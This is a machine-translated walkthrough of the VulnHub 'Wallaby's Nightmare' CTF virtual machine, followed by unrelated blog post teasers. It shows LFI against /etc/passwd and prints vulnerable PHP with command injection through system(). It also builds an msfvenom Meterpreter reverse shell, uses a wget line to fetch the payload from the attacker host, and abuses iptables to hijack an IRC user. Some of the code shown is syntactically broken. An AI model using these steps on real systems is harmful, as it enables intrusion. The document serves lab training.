VulnHub: Throw out the undesirables of the IRC Wallaby''s Nightmare

All kind time of day, after a short break, return to the analysis of virtualk with VulnHub. And Wallaby's: Nightmare (v1.0.2), as the author writes, the creation of this boot2root was inspired by some of the previous CTF from this site, but what I think you'll be able to guess.

Run VirtualBox, or what you like, and after loading the image, start to study this test:

the 
$ sudo arp-scan -l-I wlan0

192.168.1.4 08:00:27:d9:00:aa CADMUS COMPUTER SYSTEMS

Where would we be without nmap'a, detectin open ports:

the 
$ sudo nmap 192.168.1.4 -sV

Nmap scan report for 192.168.1.4
Host is up (0.00074 s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
6667/tcp filtered irc
MAC Address: 08:00:27:D9:00:AA (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Let's start with the web server at the same time see that it is spinning:



Some form, input user name, remember her, and will try anything to enter:



Give us some tips and offered to start, or to continue:



This is interesting, but refreshing the page, we get a connection error. Scan again the full range, we find that the port on which hangs the apache changed:
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
6667/tcp filtered irc
60080/tcp open http Apache httpd 2.4.18 ((Ubuntu))

We try to go and see the following:



Not finding here the continuation of the story, run nikto:



Nikto argues that found LFI, follow the link and get the contents of the file passwd:

/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync.
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
walfin:x:1000:1000:walfin,,,:/home/walfin:/bin/bash
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:109:117:MySQL Server,,,:/nonexistent:/bin/false
steven?:x:1001:1001::/home/steven?:/bin/bash
ircd:x:1003:1003:,,,:/home/ircd:/bin/bash


But not all so simple... Look in page code and find the message:

the 
<!--This is what we call 'dis-information' in the cyber security world! Are you learning anything new here admin?-->

And as proof:



Try to cycle through the available settings:

the 
$ sudo dirb http://192.168.1.4:60080/index.php?page= /usr/share/dirb/wordlists/big.txt -w



Starting to check them in turn and reaching mailer found in code page here's a review:


Hmm, but what if you try to run the command?


It worked, and it's not another draw! View what is hidden in these scripts:

index.php
<?php
# basic webpage routing
$page = filter_input(INPUT_GET, 'page');
$open = fopen("/var/www/html/uname.txt", "r");
$levelone = "/var/www/html/levelone.txt";
$username = fgets($open);
$ip = $_POST['ip'];

# whitelist webpage filter
$webpageWhitelist = ['index', 'contact', 'home', 'blacklist', 'mailer', 'name'];


# Begin filtering the $page variable
if ($page === "name" and file_exists($levelone)) {
include('/var/www/html/uname.txt');
}
elseif ($page === "home" and file_exists($levelone)) {
include('s13!34g$3FVA5e@ed/home.php');

elseif ($page = = = 'home' or isset($page) === false and !file_exists($levelone)) {
include('s13!34g$3FVA5e@ed/althome.php');
}
elseif (in_array($page, $webpageWhitelist, true) === true and $page !== "name") {

# If the web page is on the whitelist. Show it.
include "s13!34g$3FVA5e@ed/{$page}.php";
}
elseif (isset($page) === false) {

# Or else, IF the web page variable is NULL/Not Set. Assume the home page is wanted.
include 's13!34g$3FVA5e@ed/index.php';
}
elseif (strpos($page, '/etc/passwd') !== false) {
include 's13!34g$3FVA5e@ed/honeypot.php';
}
elseif (strpos($page, '/') !== false and file_exists($levelone)) {
echo "<h2>That's some fishy stuff you're trying there <em>{$username}</em>buddy. You must think Wallaby codes like a monkey! I better get to securing this SQLi though...</h2>
<br />(Wallaby  caught  you trying an LFI, you gotta be sneakier! Difficulty level has increased.)";
system('rm /var/www/html/levelone.txt');
}
elseif (strpos($page, '/') !== false) {
echo "<h2>Nice try <em>{$username}</em>buddy, this vector is patched!</h2>";
}
elseif (strpos($page, '\") !== false) {
echo "<script>window.RTCPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection; //compatibility for firefox and chrome
var pc = new RTCPeerConnection({iceServers:[]}), noop = function(){};
pc.createDataChannel(\"\"); //create a bogus  data  channel
pc.createOffer(pc.setLocalDescription.bind(pc), noop); // create offer and  set  local description
pc.onicecandidate = function(ice){ //listen for candidate events
if(!ice || !ice.candidate || !ice.candidate.candidate) return;
var myIP = /([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/.exec(ice.candidate.candidate)[1];
alert('Your ip is' + myIP + ', consider it blacklisted for a bit :D.');
post('/?page=blacklist', {bl: myIP});
pc.onicecandidate = noop;
};</script>
<noscript>Wtf...where'd you go <em>{$username}</em></noscript>";
}
else {

# Or else, we will show them a 404 web page instead
#include 'pages/errors/404.php';
echo "<h2>Dude <em>{$username}</em> what are you trying over here?!</h2>";
}
?>


mailer.php
<?php
$cmd = $_GET['mail'];
if (strpos($cmd, 'nc') !== false) {
echo '<h5>How you gonna use netcat so obviously. Cmon man. This is all in the logs.</h5>';
}
else {
system("{$cmd}");
}
echo "<h2 style='color:blue;'>Coming Soon guys!</h2>
<!--a href='/?page=mailer&mail=mail wallaby \"message goes here\"'><button type='button'>Sendmail</button-->
<!--Better finish implementing this so {$username} can send me all his loser complaints!-->";
?>


Now is the time to take msfvenom, and configure a full-fledged shell:

the 
$ sudo msfvenom -p linux/x64/mettle/reverse_tcp lhost=192.168.1.124 lport=4444 -f elf > ./x64mettle

And config for msfconsole:

the 
$ cat meterpreter.rc 
use exploit/multi/handler
set payload linux/x64/mettle/reverse_tcp
set lhost 192.168.1.124
set lport 4444
run

Loaded it all on our target host, using the script mailer using the following command:

the 
wget http://192.168.1.124/x64mettle.bin -O /tmp/x64mettle.bin

Run handler Metasploit, launching our binary and a few seconds later, we have a full shell. First check whether the current user can execute commands using sudo:

the 
sudo-l
User www-data may run the following commands on ubuntu:
(waldo) NOPASSWD: /usr/bin/vim /etc/apache2/sites-available/000-default.conf
(ALL) NOPASSWD: /sbin/iptables

Not much, but for www-data — this even too. Look at iptables:

the 
sudo /sbin/iptables-L
Chain INPUT (policy ACCEPT)
target prot opt source destination 
ACCEPT tcp -- localhost anywhere tcp dpt:ircd
DROP tcp -- anywhere anywhere tcp dpt:ircd

Chain FORWARD (policy ACCEPT)
target prot opt source destination 

Chain OUTPUT (policy ACCEPT)
target prot opt source destination

As you remember, nmap found port 6667, and marked it as filtered. It's time to change that, dropping everything on the standard settings:

the 
sudo /sbin/iptables-F

Check the result:

the 
$ sudo nmap 192.168.1.4 -p 6667
Nmap scan report for 192.168.1.4
Host is up (0.00025 s latency).
PORT STATE SERVICE
6667/tcp open irc
MAC Address: 08:00:27:D9:00:AA (Oracle VirtualBox virtual NIC)

Connected:



The /LIST command showed the presence channel 1:



Logging on to that, you can see there are another 2 users:

Nicks #wallabyschat: [@waldo GH0st3rs wallabysbot]

The user waldo to communicate with me did not want to, but wallabysbot was more friendly



OK, we have access to iptables that we should dropnode waldo chat?

the 
sudo /sbin/iptables-I OUTPUT-m owner --uid-owner 1000-p tcp --dport 6667 -j DROP

Wait until the end of his session in IRC, change your nickname on the waldo, and get 1 shell:


Check out what is available to that user, and available to him as it turned out a lot



Pick up the flag, enjoy greetings, and + 1 passed Boot2Root CTF:

Article based on information from habrahabr.ru

Комментарии

Отправить комментарий

Популярные сообщения из этого блога

Wikia Search — first impressions

Изображение
Today, January 7, as promised, was launched search engine Wikia Search , still only in alpha version. ( edit Angela Beasley at 06:58 UTC or 09:58 Moscow time.) Of bugs: when searching in Russian (for example, the word habrahabr ) there are errors with the coding, although it seems that everything is in utf-8. Users who have an account on Wikia, you can login with the same username, but properties users flew in Wikia Search Alpha, and on the Wikia website. About search: while search (English queries), you can create ministate (miniarticles). Next to the search result indicates the number like 1.26 (something like pagerank'a or TIC), clicking on which shows how it was counted. When you hover over the number next to it shows the stars, which don't work (looks like that will be implemented by the ranking of results). It is unclear how results are ranked, because the query " George Bush " first gets a website "George Bush Is A Crackwhore!" wit...
Далее...

Emulator data from GNSS receiver NMEA

Изображение
Introduction I had the need to test an application that uses the GNSS data NMEA. was Due to the fact that worked on the project navigation of the aircraft, test the air expensive naturally on earth to drive a car with a GNSS receiver is not particularly convenient, that like sitting at the table to have a virtual parallel port data Protocol NMEA allegedly moving equipment. First, search for different software had to try and find something suitable, but most paid and control of the emulation data is not very convenient, although practically emulate all settings of the NMEA standard. But I needed something simple emulating coordinates, speed, in principle, nothing more was required quite convenient and logical control. So I had to write an app of this kind in C#. Fly_nmea NMEA ("National Marine Electronics Association") — the full name is "NMEA 0183" is a text communication Protocol, marine (typically navigation) equipment together. Data is transmit...
Далее...

mSearch: search + filter for MODX Revolution

Изображение
Something blog MODX habré completely withered, we need to spice things up. I want to introduce you to your component, which has recently been almost completely rewritten and expanded. It's called mSearch and originally conceived as a simple site search with account of morphology of the Russian language. That is, you had a quick and easy solution for any site without installing Sphinx and other major systems. In the process gugleniya, I came across a interesting this task by phpMorphy . Full text search on a table with an index, with the generation of different word forms. The idea I liked, by my criteria it came up and I wrote my solution, basing this method. the mSearch This snippet and plugin. The snippet is looking for the plug-in index documents when saving. Installation, as usual, from the repository, in 4 clicks. At the same time, you will be prompted to download and install for phpMorphy dictionaries of the Russian language — do not give up. ...
Далее...